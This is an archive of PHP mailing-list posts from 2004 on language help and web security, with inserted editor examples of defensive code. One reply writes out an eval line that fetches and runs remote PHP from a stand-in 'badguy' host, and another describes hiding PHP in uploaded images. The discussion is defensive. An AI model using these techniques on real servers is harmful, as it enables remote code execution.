> As I'm studying, and learning, PHP, I use certain resources again 
> and again. A few books I've bought, some web sites, this mailing list,
> and the PHP manual. I've taken the often repeated 'RTFM' to heart, and
> I attempt to google or RTFM before considering a post to the list with
> a question, but now I have a question about the manual itself. I've 
> noticed that most of the replies to the questions on this list, when 
> they refer to a part of the manual,  point to the same few sections 
> over and over. Such as arrays, strings, sessions, objects, and a few 
> others. My question is this, when I'm reading the manual, is just that
> I should be concentrating on a few sections (and if so, which?), or 
> should I be giving equal attention to all the sections, including some
> (I suppose) I might never use.

I would recommend reading EVERYTHING in the PHP manual UP TO "Section
VI: Function Reference"

All of that stuff is what defines the core PHP Language, and if you
don't know it, you're going to waste a lot of time on Voodoo
Programming.

Voodoo Programming: You do things that "work" but you have completely
erroneous beliefs about *why* and *how* they work.

If you know the jargon for what you are looking for, Google is your
buddy; But if you don't, and can only describe what you want in a
paragraph of a question, then re-read all of that, plus the FAQs.

You then want to skim through the main page of each "function reference"
section.  Currently that's 135 (!) pages.  Some of them you can quickly
dismiss as "irrelevant for all time to me" :-)  Others, you'll find out
that there's an entire science to something you thought you'd have to
invent for yourself.

Yes, that's a lot of reading.

No, you won't remember all of it.

Hell, you might not even understand all of it when you read it.

Once upon a time, I even posted an FAQ to the list, way back when,
because while I had *read* the FAQ initially, there were FAQs I didn't
even understand the Question to, much less the Answer.

Six months later, of course, I ran into the question in my own needs,
and, well, didn't *RE*-read the FAQ.

Take note of the stuff you don't understand at all, and try to memorize
the buzz-words or what you think they might be all about.

The hair you save may be your own. :-)

-- 
Like Music?
http://l-i-e.com/artists.htm




Re: [PHP] Question: urldecode

2004-12-09 Thread Richard Lynch
Stuart Felenstein wrote:
> In my search page, the url returned comes back with
> the ..err I forget what it's called, but query string
> looks like this: %5B%5D=3.  I think the %5B and 5D
> should be [].
>
> What I think is needed is rawurldecode.  I've looked
> through my code and think it belongs somewhere in this
> block:

Don't guess.

Figure out *EXACTLY* where and when the URL is being encoded to Hex --
where it first appears in your scripts/database/application as %5B.

Decide if it's "right" for it to be in Hex at that point.


If it's not right for it to be Hex at that point, change it there.

You'll drive yourself crazy changing it here, where it's already in the
system in a format you don't want.

My *GUESS* is that you're taking the QUERY string and stuffing it into
your database.

Since you grab the raw query string, it's in Hex-encoded format.

Maybe that's a Good Thing to store in your database.

Maybe it's not.

All depends what you're going to do with it in the *REST* of the application.

But I cannot stress enough that you've got to understand where and how
this data is coming from, in what format, and *DESIGN* your application to
have the data you want in the place you want.

Going about it like you are now, just sort of guessing at what's there and
trying to slap in a patch to change it, is going to drive you crazy in the
long run.

Your solution isn't necessarily wrong:  Your approach to making the
decision is :-)

-- 
Like Music?
http://l-i-e.com/artists.htm




Re: [PHP] Question:maybe urldecode

2004-12-09 Thread Jason Wong
On Friday 10 December 2004 00:24, Stuart Felenstein wrote:

> Jason, I don't think you read or understood my
> question. 



> As I said, it doesn't seem to be a debugging 
> scenario.I was asking if anyone would know a
> reason why on one page , one could apply the query
> string to  url and the page would be filled in and
> another page it doesnt work. 

The obvious (and banal) answer is that the pages are different. Find out what 
the significant differences are. How? If you are a genius you could do that 
with your eyes closed just by comparing the source. If you are stupid like I 
am then you would have to go through the tedious task of examining the 
contents of the variables and figure out what the heck is happening.

-- 
Jason Wong -> Gremlins Associates -> www.gremlins.biz
Open Source Software Systems Integrators
* Web Design & Hosting * Internet & Intranet Applications Development *
--
Search the list archives before you post
http://marc.theaimsgroup.com/?l=php-general
--
/*
Q: What is printed on the bottom of beer bottles in Minnesota?
A: Open other end.
*/




Re: [PHP] allow_url_fopen ini directive not enough

2004-12-09 Thread Richard Lynch
Kelvin Jones wrote:
> I would like to see a new directive to go alongside "allow_url_fopen" to
> allow people to turn on or off the ability to include/require a remote
> file.
>
> The ability to include and execute a file as php from a remote host
> leaves many applications open to cross-site-scripting attacks.
> This would be easily avoidable if we had a directive
> (allow_url_include?) that by default removed this capability.

Seems kinda pointless to me...

If a programmer is dumb enough to include/require untrusted source code,
they can just as easily do:

eval(implode('', file('http://example.com/badguy.php')));

after you've turned "OFF" allow_url_include but left allow_url_fopen "ON"

If an attacker is managing to alter your PHP source to pull in his remote
PHP, then the remote PHP feature isn't really all that crucial -- It's
more convenient for them to suck it in from their remote server, perhaps,
or maybe they are worming through a database field that is too short to
hold all their source, so they shove in an "include" -- Still, *any* PHP
code they can execute will eventually give them control anyway.

If an attacker gains access to remote "trusted" source and replaces it,
then your decision to trust that source was faulty -- Which is neither
helped nor hindered by the remote include function, really.  If you needed
that source, you can find a way to get it and have PHP evaluate it, unless
you disable all remote file access completely... Even then, a cron job to
snag it with wget, and an include, and you're back at Square One.

I guess I'm saying that only education and diligence by programmers is
going to avoid this attack.  Turning off only the remote include, but not
remote fopen, won't stop anybody with half a clue for more than 30
seconds.

This is just my take on it, and there could easily be subtle issues or
known exploits you are trying to squash of which I know nothing.

-- 
Like Music?
http://l-i-e.com/artists.htm
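Added example (editor-supplied, not from the thread) of what Richard's "education and diligence" looks like in code: the request never supplies a path to include(), only a key into an allowlist, and the resolved path is checked against the base directory with realpath(), which also strips stream wrappers such as http://. The page names and temporary directory are constructed; the script runs stand-alone and cleans up after itself.

```php
<?php
// Added example, not code from the thread. Demonstrates the programmer-side
// fix for remote/local file inclusion: no request-controlled string ever
// reaches include(). Page names and the temp directory are constructed.

// Allowlist first: only names we know about can ever be included.
const PAGES = ['home' => 'home.php', 'search' => 'search.php', 'help' => 'help.php'];

// Resolve a requested page name to a file under $baseDir, or return null.
// The request only selects a key in PAGES; the resulting path is then run
// through realpath(), which resolves ".." and returns false for stream
// wrappers, so neither "http://..." nor traversal can escape $baseDir.
function resolvePage(string $requested, string $baseDir): ?string
{
    if (!array_key_exists($requested, PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$requested]);
    if ($base === false || $path === false) {
        return null;
    }
    // Defence in depth: even an allowlisted entry must live under $base.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Build a throwaway page directory so the example runs anywhere.
$dir = sys_get_temp_dir() . '/pages_' . getmypid();
mkdir($dir);
foreach (PAGES as $file) {
    file_put_contents("$dir/$file", "<?php return 'rendered ' . basename(__FILE__);");
}

// Constructed requests: two legitimate keys, a remote URL (the thread's
// example host) and a traversal attempt. Only the keys resolve.
foreach (['home', 'http://example.com/badguy.php', '../config.php', 'search'] as $req) {
    $path   = resolvePage($req, $dir);
    $result = $path === null ? 'refused' : (include $path);
    printf("%-32s -> %s\n", $req, $result);
}

array_map('unlink', glob("$dir/*.php"));
rmdir($dir);
```

allow_url_include (added in PHP 5.2) defaults to off and is worth keeping off, but as the post says it is only a second line: whoever controls the string handed to include() still has every local file, and whoever controls any executed PHP has everything. The allowlist removes the attacker-controlled string altogether, which is the fix no ini directive can give you.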




[PHP] Unsubscribing Junk Emails From the List: requests@firstustrading.com

2004-12-09 Thread Justin Palmer
Hi,

Every time I send a response to the list I get a auto-reply from:
[EMAIL PROTECTED]

Is there someone that I could email that can delete this user from the
list?

Thanks for any information.

Regards,

Justin Palmer
__
KISS (Keep It Simple, SEARCH)!
Google::getUri( http://www.google.com );
Archives::getUri( http://marc.theaimsgroup.com/?l=php-general );




Re: [PHP] Finding the location of an included script

2004-12-09 Thread Jason Wong
On Thursday 09 December 2004 22:46, Gadi Cohen wrote:
> So if I have:  include("/path/to/backend.php");
>
> Is there a way from inside of backend.php to return "/path/to" ?

  echo __FILE__;

-- 
Jason Wong -> Gremlins Associates -> www.gremlins.biz
Open Source Software Systems Integrators
* Web Design & Hosting * Internet & Intranet Applications Development *
--
Search the list archives before you post
http://marc.theaimsgroup.com/?l=php-general
--
/*
I have never let my schooling interfere with my education.
  -- Mark Twain
*/




Re: [PHP] PHP4 mysqli with mysql 4.1.7?

2004-12-09 Thread Richard Lynch
Francis Mak wrote:
> mysqli_query($c, "SET CHARACTER SET utf8;");

The naive user, who understands *NOTHING* about i18l (?) functions,
character sets, or anything other than American English (and not all that
up on the esoterics of grammar in that) asks:

What happens in your application if you just do:

mysql_query("SET CHARACTER SET utf8", $connection) or die(mysql_error());

right after you connect to the database?

In an ideal world, you've told MySQL to use utf8, and that would be that.

Yeah, right.

Worth a try, since it will take you 5 seconds, and *might* "just work"

You may want to repeat your question on the PHP International list, if
that's still going.

-- 
Like Music?
http://l-i-e.com/artists.htm




Re: [PHP] help me split chars w/o spaces by 2... like: 2004

2004-12-09 Thread ApexEleven
I did something like this a while back, I believe I used chunk_split

[code]

[/code]

it'll output something along the lines of:
20
04

Hope this helps,

-- 
<<
Jasper Howard - Database Administration
ApexEleven.com
530 559 0107
--->>

On Thu, 9 Dec 2004 10:21:49 +0800, Louie Miranda <[EMAIL PROTECTED]> wrote:
>  $hello2 = chop($year_split);
> echo $hello2;
> ?>
> 
> outputs: 2004
> 
> Whats the correct syntax for it? The manual said..
> 
> This function is an alias of rtrim().
> 
> and:
> 
> rtrim
> (PHP 3, PHP 4 )
> 
> rtrim --  Strip whitespace from the end of a string
> 
> 
> 
> 
> On Wed, 08 Dec 2004 18:11:19 -0800, Tyler Replogle <[EMAIL PROTECTED]> wrote:
> > have you tride using chop() ?
> > # begin code
> > $year_split = date("Y");
> > $chars = chop($year_split);
> > $chars[0] // = 2
> > $chars[1] // = 0
> > $chars[2] // = 0
> > $chars[3]  //= 4
> > # end code
> > I hope that will help
> >
> > >From: Louie Miranda <[EMAIL PROTECTED]>
> > >Reply-To: Louie Miranda <[EMAIL PROTECTED]>
> > >To: [EMAIL PROTECTED]
> > >Subject: [PHP] help me split chars w/o spaces by 2... like: 2004
> > >Date: Thu, 9 Dec 2004 09:55:57 +0800
> >
> >
> > >
> > >Help me split chars w/o spaces by 2... like: 2004
> > >How can i make it?
> > >
> > >first: 20
> > >second: 04
> > >
> > >Im working on this..
> > >
> > ># begin code
> > >$year_split = date("Y");
> > >$chars = preg_split('//', $year_split, -1, PREG_SPLIT_NO_EMPTY);
> > ># end code
> > >
> > >But it splits the whole "2004" string..
> > >
> > >Array
> > >(
> > > [0] => 2
> > > [1] => 0
> > > [2] => 0
> > > [3] => 4
> > >)
> > >
> > >
> > >--
> > >Louie Miranda
> > >http://www.axishift.com
> > >
> > >
> >
> >
> 
> --
> Louie Miranda
> http://www.axishift.com
> 
> 
> 



-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



[PHP] Confused - $GLOBALS

2004-12-09 Thread Danny Brow
Below is a snip of a program I am writing, I am a little new to php.
Anyhow, I can't for the life of me figure out why one of my functions
cannot grab the item_pics1 variable. I have tried passing the variable
to the function, tried using $GLOBALS['item_pic1']. So I guess my
question is, does PHP in some cases need to have a variable in an if
statement sent back to the global scope? everything works but the
str_replace item_pics1. Hope this is enough code.


if (array_key_exists('pictures', $_POST)) {
    $how_many_pics = $_POST['pictures'];
    picture_input($how_many_pics);
    //process_errors();
    $k = '1';
    while ($k <= $how_many_pics) {
        $item_pics1 .= "";
        $item_pics1 .= "";
        $k++;
    }
    html_form($title, $price, $descrip, $current_items,
              $title_file_name, $errors);
} else {
    print '';
    print 'How Many pictures do you have?: ';
    print '';
}



function html_template() {
    if (file_exists('item.html')) {
        $html_template = $GLOBALS['html_template'];
        $html_template = str_replace('{pictures2}',
                                     $GLOBALS['item_pics1'], $html_template);
        $html_template = str_replace('{title}', $GLOBALS['title'],
                                     $html_template);
        $html_template = str_replace('{description}',
                                     $GLOBALS['descrip'], $html_template);
        $html_template = str_replace('{price}', $GLOBALS['price'],
                                     $html_template);
        $item_file_name = $GLOBALS['root_dir'] . "/" . $GLOBALS['dir'] .
                          "/item.html";
        $item_fh = fopen($item_file_name, 'x+');
        fwrite($item_fh, $html_template);
        fclose($item_fh);   // release the handle once the template is written
    } else {
        $GLOBALS['errors'] .= "item.html template does not exist";
    }
}

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] about installing php

2004-12-09 Thread Richard Lynch
satya bharti wrote:
> sir,
> I am using Red Hat Linux 8.0, and tried many times to install apache 2.0
> and php4.0  many times, the message comes that apache and php has
> installed on my system. when i execute a php program through my web
> browser it shows blank. what causes this and how can I solve this problem?
> please help on this matter.

Any time a PHP page shows blank, you should use your browser's "View
Source" menu to see what's *REALLY* in there.

It can help you understand what is going on most of the time.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] login.php

2004-12-09 Thread Richard Lynch
badlya badlu wrote:
> This is my first mail to php mailing list. i want to
> create one login.php program in linux. i want this
> page to go the ldap server for authentication. how
> should i do it.

http://php.net/ldap

You may also want to just use somebody else's LDAP PHP script.

I'm betting you could find one at http://phpclasses.org or just Google for
"LDAP PHP"

One thing for sure:  The mailing list community isn't going to just write
the code for you and post it here. :-)

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Close all open tags in HTML text

2004-12-09 Thread Richard Lynch
Matt Palermo wrote:
> I am allowing users to input HTML code into a textarea.  After they input
> this, I want to output their HTML to the browser.  In order for the
> document
> to be safe, I need to close all open HTML tags that have been left open by
> the user, along with any open comments.  Is there a way to take an HTML
> string and add closing tags and comments to it if needed?

After you use http://php.net/tidy to fix the HTML, use
http://php.net/strip_tags to rip out all but the handful of tags you
really want to allow them to use, most especially any JavaScript they
might shove in to attack your (and my!) server.

I *think* strip_tags rips out JavaScript.   RTFM to be sure.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



RE: [PHP] Question:maybe urldecode

2004-12-09 Thread Stuart Felenstein

--- Richard Lynch <[EMAIL PROTECTED]> wrote:

> Then your new script is broken, as clearly the GET
> parameters *ARE* there.

Sorry, I'm not following you.  Where are my GET
parameters?  The way I've built my present script is
the results page is grabbing the parameters.  Do I need
to set up GET parameters in the first/search page?

> 
> Is the new script on a different server or in a
> different directory? 
> Perhaps with register_globals turned OFF?
> 
No, same server. The new scripts are in a different
directory than the previous one. They are not related
or call to each other. Register_globals are set to ON.

Stuart

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Confused - $GLOBALS

2004-12-09 Thread John Nichel
Danny Brow wrote:
Below is a snip of a program I am writing, I am a little new to php.
Anyhow, I can't for the life of me figure out why one of my functions
cannot grab the item_pics1 variable. I have tried passing the variable
to the function, tried using $GLOBALS['item_pic1']. So I guess my
question is, does PHP in some cases need to have a variable in an if
statement sent back to the global scope? everything works but the
str_replace item_pics1. Hope this is enough code.

If you want to use a variable from outside the function, you either have 
to pass it to the function; if you want to change it, you have to pass 
it by reference, or make it global inside the function

function foo ( $bar ) {
  /--code--/
}

function foo ( &$bar ) {
  /--code--/
}

function foo() {
  global $var;
  /--more code--/
}
I may be mistaken, but I think the $GLOBALS array was introduced in 4.3.0.
http://us4.php.net/manual/en/language.variables.scope.php
--
John C. Nichel
ÜberGeek
KegWorks.com
716.856.9675
[EMAIL PROTECTED]
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


Re: [PHP] Confused - $GLOBALS

2004-12-09 Thread John Nichel
Belay that...the $GLOBALS array has existed since PHP3
--
John C. Nichel
ÜberGeek
KegWorks.com
716.856.9675
[EMAIL PROTECTED]
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php


[PHP] Object In Object

2004-12-09 Thread Dinçer Akay
Hi,
Is this a good way ?
<?php
class main
{
    var $mysql;
    var $user;

    // PHP 4 style constructor: creates the helper objects once
    function main()
    {
        $this->mysql = new mysql();
        $this->user  = new user();
    }
}

class Mysql
{
    function x() { return "Some Query Result for "; }
}

class user
{
    var $username;
    function user() { $this->username = "Guest"; }
}

/* Other subclasses */
class Data extends main
{
    // Data has no constructor of its own, so PHP 4 runs main() for it
    function getText()
    {
        echo $this->mysql->x();
        echo $this->user->username;
    }
}

$class = new main();
$data  = new Data();
$data->getText();

?>

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Unsubscribing Junk Emails From the List: requests@firstustrading.com

2004-12-09 Thread Danny Brow
I'm getting it too.

On Thu, 2004-12-09 at 09:49 -0800, Justin Palmer wrote:
> Hi,
> 
> Every time I send a response to the list I get a auto-reply from:
> [EMAIL PROTECTED]
> 
> Is there someone that I could email that can delete this user from the
> list?
> 
> Thanks for any information.
> 
> Regards,
> 
> Justin Palmer
> __
> KISS (Keep It Simple, SEARCH)!
> Google::getUri( http://www.google.com );
> Archives::getUri( http://marc.theaimsgroup.com/?l=php-general );
> 

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Confused - $GLOBALS

2004-12-09 Thread Danny Brow
On Thu, 2004-12-09 at 13:41 -0500, John Nichel wrote:
> Danny Brow wrote:
> > Below is a snip of a program I am writing, I am a little new to php.
> > Anyhow, I can't for the life of me figure out why one of my functions
> > cannot grab the item_pics1 variable. I have tried passing the variable
> > to the function, tried using $GLOBALS['item_pic1']. So I guess my
> > question is, does PHP in some cases need to have a variable in an if
> > statement sent back to the global scope? everything works but the
> > str_replace item_pics1. Hope this is enough code.
> 
> 
> If you want to use a variable from outside the function, you either have 
> to pass it to the function; if you want to change it, you have to pass 
> it by reference, or make it global inside the function
> 
> function foo ( $bar ) {
>   /--code--/
> }
>
> function foo ( &$bar ) {
>   /--code--/
> }
> 
> function foo() {
>   global $var;
>   /--more code--/
> }
> 
See this is where the confusion is, I've tried all these and it still
does not work.  I'm going to read the whole page on variable scope a few
times, see if I missed something.  Maybe it's something else in my code
screwing my up.

Thanks.
Dan.

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



[PHP] Re: Object In Object

2004-12-09 Thread Matthew Weier O'Phinney
* Dinçer akay <[EMAIL PROTECTED]>:
> Is this a good way ?
> 
> class main{
> var $mysql;
> var $user;
> function main(){
> $this->mysql=new mysql();
> $this->user=new user();

If you're developing strictly for PHP5, this will work fine. However, if
you're in PHP4, you're going to want to use references. Try the
following:

  $mysql       =& new mysql();
  $this->mysql =& $mysql;
  $user        =& new user();
  $this->user  =& $user;

Other than that, yes, this is a fairly standard mechanism in PHP's OOP.

-- 
Matthew Weier O'Phinney   | mailto:[EMAIL PROTECTED]
Webmaster and IT Specialist   | http://www.garden.org
National Gardening Association| http://www.kidsgardening.com
802-863-5251 x156 | http://nationalgardenmonth.org

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Re: PHP Security

2004-12-09 Thread Richard Lynch
>> Also, you *SHOULD* force the file to be saved on your server
>> with the correct extension. If a user can upload a JPEG with
>> .php on the end, or worse, with php in the middle of the
>> filename, and then your server puts that file in the web tree or
>> otherwise allows it to be executed, *YOU* (and your server
>> admin) screwed up your security, not PHP.
>
> Trusting the name provided by the client is certainly a bad practice, but
> I wouldn't consider "php" in the middle of a filename to be worse than
> extension manipulation. I'm not sure what gave you that idea, but it's
> just not true.

The original article, in another newsgroup/list, referenced a server seen
by that author, where the SysAdmin had configured the server to use PHP to
parse any file whose name contained 'php'.

Not ending in '.php' ('.php$')

Nor even ending in 'php' ('php$')

But containing 'php' ('.*php.*').

phplogo.jpg, when surfed to, went through PHP.

Real-life problem.

Yes, that's a horribly-configured server.

No, I don't think you'd have that on your server.

But I'd bet at least one reader on this list misunderstands the Apache
Files directive (with and without the ~) badly enough that they've got
this gaping hole on their server.

Now combine that with putting uploaded JPEGs in the web tree, and what
have you got?

My grammar in my post incorrectly put the 'or worse' near 'php in the
middle' when it should have been near 'your server ... allows it to be
executed'

The real culprit, is, of course, the mis-configured server.

But it takes two to tango, here, and throwing the JPEGs in the web tree
should not be done unless you *NEED* to do that, for performance, after
due consideration and a security audit to be *SURE* that the JPEGs cannot
ever possibly get executed as PHP.

>> Under *NO* circumstances should a file uploaded by an
>> untrusted user be put into your web tree. You should *KEEP* it
>> outside the web tree, and use PHP to http://php.net/readfile it
>> when it needs to be displayed. Since you are using PHP's
>> readfile function to *READ* the file, Apache won't have any
>> chance to get fooled into thinking it's supposed to be a PHP file
>> and be parsed by PHP.
>
> This is misleading. It is fine to put uploaded files within document root,
> and in fact many applications may require this. Using readfile() is not
> realistic except for small sites - the performance penalty alone makes
> this a poor approach, since it provides very little value.
>
> That being said, it's true that you should not trust the name provided by
> the client (or anything provided by the client), but this is much
> different than blind paranoia. If this perspective were applied to HTML
> forms, no one could use them.

You don't take raw data from HTML forms and save the field values into
your web tree do you?

You scrub the incoming data from the web form and make sure, as much as
possible for the given field, that it is benign, right?  And you certainly
don't http://php.net/eval that untrusted data from a user, do you?

Then why in the world would you take an untrusted, unscrubbable, binary
file and shove it into your web-tree?!

Can you be 100% certain that  is not embedded
in the JPEG?  How?  getimagesize() will tell you the JPEG headers are
kosher, but not confirm that the JPEG itself is really really just JPEG
data.

Even viewing it would only, at best, show you an ugly JPEG.

You could egrep for , and assume that that's not valid in any
JPEG, but it probably actually *IS* valid in at least one real JPEG -- And
if you allow JPEG comments, it would be trivial to have a zillion JPEGs
that would pass any automated validation of JPEG-ness that have PHP code
in the comment.

What's to stop the bad guy from taking a valid JPEG, cramming PHP code
into it, and then surfing to the image directly in such a way that the PHP
code gets executed?

Sure, your server configuration almost for sure doesn't have .jpg files
going through the PHP parser.  But if they can find a way to force that to
happen:
  Altering an .htaccess file somewhere, or forcing one to be uploaded.
  Finding an old cgi-bin setup on the server.
  Getting the CLI PHP to execute the JPG as a script.

It's hard to imagine that last one without them being able to just TYPE a
PHP script, mind you, but some whack 'sudo' setup might do it.  Think
every SysAdmin who uses sudo really understands sudo completely?

Hopefully, none of these things can be done on your server.  If you are
100% certain that none of these could ever possibly occur, then you are
confident that the JPEGs with PHP embedded will only be ugly JPEGs.

But if there is any doubt in your mind that a malicious user could manage
to get the JPEG to be passed through PHP (or Perl or ...) then you've got
a risk there that may not be obvious to the casual
Reader/Sysadmin/Programmer.

Busy servers may have a performance problem with using the readfile
solution -- But that's no excuse to expose that busy server by just
thr
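
A concrete version of the advice in this post (store the upload outside the web tree under a server-chosen name, stream it back with readfile()), added here as an example; it is not code from the thread. The paths, the `image.php?id=` convention and PHP 7.1+ are assumptions.

```php
<?php
// Added example, not from the mailing list. Uploaded images are written
// OUTSIDE the document root and served by this script, so Apache never
// gets a chance to treat an upload as something to execute.
// Assumed layout (placeholder paths): /var/www/html is DocumentRoot and
// /var/www/uploads is writable by the web server but never served directly.

const UPLOAD_DIR = '/var/www/uploads';

// MIME types reported by getimagesize() and the fixed extension we store them under.
const IMAGE_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

/**
 * Validate one entry of $_FILES and move it out of the web tree.
 * Returns the opaque id a later request uses to fetch the image, or null.
 */
function store_uploaded_image(array $file): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // getimagesize() only checks the image header. As the post says, it cannot
    // prove the body is pure image data, which is exactly why the file must not
    // land anywhere the server could be talked into executing it.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || !isset(IMAGE_TYPES[$info['mime']])) {
        return null;
    }
    // The client-supplied filename is ignored entirely: the server picks a
    // random id and an extension derived from the detected type.
    $id   = bin2hex(random_bytes(16));
    $dest = UPLOAD_DIR . '/' . $id . '.' . IMAGE_TYPES[$info['mime']];
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    return $id;
}

/**
 * Serve a stored image for image.php?id=<hex>. The id must match a strict
 * pattern, so no path fragment from the request ever reaches the filesystem
 * call and only files produced by store_uploaded_image() can be found.
 */
function serve_image(string $id): bool
{
    if (!preg_match('/^[0-9a-f]{32}$/', $id)) {
        return false;
    }
    foreach (IMAGE_TYPES as $mime => $ext) {
        $path = UPLOAD_DIR . '/' . $id . '.' . $ext;
        if (is_file($path)) {
            header('Content-Type: ' . $mime);
            header('Content-Length: ' . filesize($path));
            header('X-Content-Type-Options: nosniff'); // browser must not re-guess the type
            readfile($path);
            return true;
        }
    }
    return false;
}

if (PHP_SAPI !== 'cli') {
    if (isset($_FILES['image'])) {
        $id = store_uploaded_image($_FILES['image']);
        echo $id === null ? 'rejected' : 'stored as ' . htmlspecialchars($id);
    } elseif (isset($_GET['id'])) {
        if (!serve_image((string) $_GET['id'])) {
            http_response_code(404);
        }
    }
}
```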

Re: [PHP] PHP Security

2004-12-09 Thread Richard Lynch
> There are better ways to do this than parsing .jpg files as PHP. One
> obvious one is:
>
> http://example.org/image.php/foo.jpg

I believe this broke on a very very very obscure version of IE -- Maybe
even the re-branded IE I ran into one time [shudder].

In theory, it was just IE X.xx.yy, but it turned out to be *different* for
some case involving rich media.

I cannot for the life of me find the references from my day job four times
removed to prove it, mind you, and maybe it was with PDF and not JPEG, but
at some point, I just don't want to give browsers (or search engines)
*ANY* realistic opportunity to spot ".php" and decide that my dynamic
image is inferior/invalid.

> Another one that I've seen referenced frequently (especially back when
> this was a larger and more common problem) is this:
>
> http://example.org/image.php?iesucks=foo.jpg

In the larger picture of rich media in general, this will fail miserably
for dynamic PDFs.

If I have to dink around with PATH_INFO for PDFs to behave, I might as
well treat my JPEGs with the same code-base and use:
http://example.com/image/iesucks/foo.jpg
http://example.com/pdf/iesucks/foo.pdf

Too many browsers, too many bugs ==> I'm not letting them waste my time
any more on their stupidity.

I wouldn't recommend that users configure servers to parse *ALL* "*.jpg"
in a directory as PHP, of course.  Ditto for "*.pdf"

But to be sure the browser can't mess up, I'll cheerfully force "image" to
be a PHP script and foo.jpg is just in the PATH_INFO, or for a one-off,
force "progress_meter.jpg" to be a PHP script.

I can't begin to estimate the number of hours I've wasted on browser bugs
with rich media where the browser used the URL to do something incredibly
stupid instead of just taking the valid data being sent and doing the
right thing.

-- 
Like Music?
http://l-i-e.com/artists.htm

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Close all open tags in HTML text

2004-12-09 Thread Marek Kilimajer
Richard Lynch wrote:
Matt Palermo wrote:
I am allowing users to input HTML code into a textarea.  After they input
this, I want to output their HTML to the browser.  In order for the
document
to be safe, I need to close all open HTML tags that have been left open by
the user, along with any open comments.  Is there a way to take an HTML
string and add closing tags and comments to it if needed?

After you use http://php.net/tidy to fix the HTML, use
http://php.net/strip_tags to rip out all but the handful of tags you
really want to allow them to use, most especially any JavaScript they
might shove in to attack your (and my!) server.
I *think* strip_tags rips out JavaScript.   RTFM to be sure.
not really, but it removes  and  so javascript is not 
interpreted.

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
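
The Tidy + strip_tags() approach from Richard's reply, with the gap Marek's answer leaves open closed: strip_tags() drops the script element but keeps every attribute on the tags you allow, so an onclick= or a javascript: href on an allowed <a> survives it. This is an added example, not code from the thread; it assumes PHP 7 with the dom extension, treats the tidy extension as optional, and the tag and attribute allowlists are my own choice.

```php
<?php
// Added example, not from the mailing list. Repair the user's HTML with Tidy
// (if present), reduce it to an allowlist of tags with strip_tags(), then walk
// the fragment with DOMDocument and drop every attribute not explicitly allowed.

function sanitize_user_html(string $html): string
{
    // 1. Close unclosed tags and comments. If tidy is missing, libxml's own
    //    repair during loadHTML() below still produces a balanced tree.
    if (function_exists('tidy_repair_string')) {
        $repaired = tidy_repair_string($html, [
            'show-body-only' => true,   // no <html>/<head> wrapper
            'wrap'           => 0,      // do not insert line breaks
        ], 'utf8');
        if ($repaired !== false) {
            $html = $repaired;
        }
    }

    // 2. Keep only simple formatting tags. <script> is removed here, but note
    //    that its text content survives as harmless plain text.
    $html = strip_tags($html, '<p><br><b><i><em><strong><a><ul><ol><li>');

    // 3. strip_tags() leaves attributes untouched, so onclick="..." on a <p>
    //    or href="javascript:..." on an <a> would still be there. Rebuild the
    //    fragment keeping only an explicit per-tag attribute allowlist.
    $allowed_attrs = ['a' => ['href', 'title']];

    $doc = new DOMDocument();
    libxml_use_internal_errors(true);   // silence warnings on sloppy markup
    $doc->loadHTML('<?xml encoding="utf-8"?><div id="root">' . $html . '</div>',
                   LIBXML_HTML_NOIMPLIED | LIBXML_HTML_NODEFDTD);
    libxml_clear_errors();

    $xpath = new DOMXPath($doc);
    $root  = $xpath->query('//div[@id="root"]')->item(0);
    if ($root === null) {
        return '';
    }
    foreach ($xpath->query('.//*[@*]', $root) as $el) {
        $keep = $allowed_attrs[strtolower($el->nodeName)] ?? [];
        // Collect names first: removing while iterating the live map skips items.
        $names = [];
        foreach ($el->attributes as $attr) {
            $names[] = $attr->name;
        }
        foreach ($names as $name) {
            if (!in_array($name, $keep, true)) {
                $el->removeAttribute($name);
            } elseif ($name === 'href') {
                // Allow only http(s), site-relative and fragment links.
                $value = trim($el->getAttribute('href'));
                if (!preg_match('#^(https?://|/|\#)#i', $value)) {
                    $el->removeAttribute('href');
                }
            }
        }
    }

    $out = '';
    foreach ($root->childNodes as $child) {
        $out .= $doc->saveHTML($child);
    }
    return $out;
}

// Constructed sample input (not from the thread): an unclosed <b>, an inline
// handler on an allowed tag, a script element and a javascript: link.
$sample = '<p onclick="alert(1)">Hello <b>world<script>alert(2)</script>'
        . '<a href="javascript:alert(3)" title="x">link</a>';
echo sanitize_user_html($sample), "\n";
```

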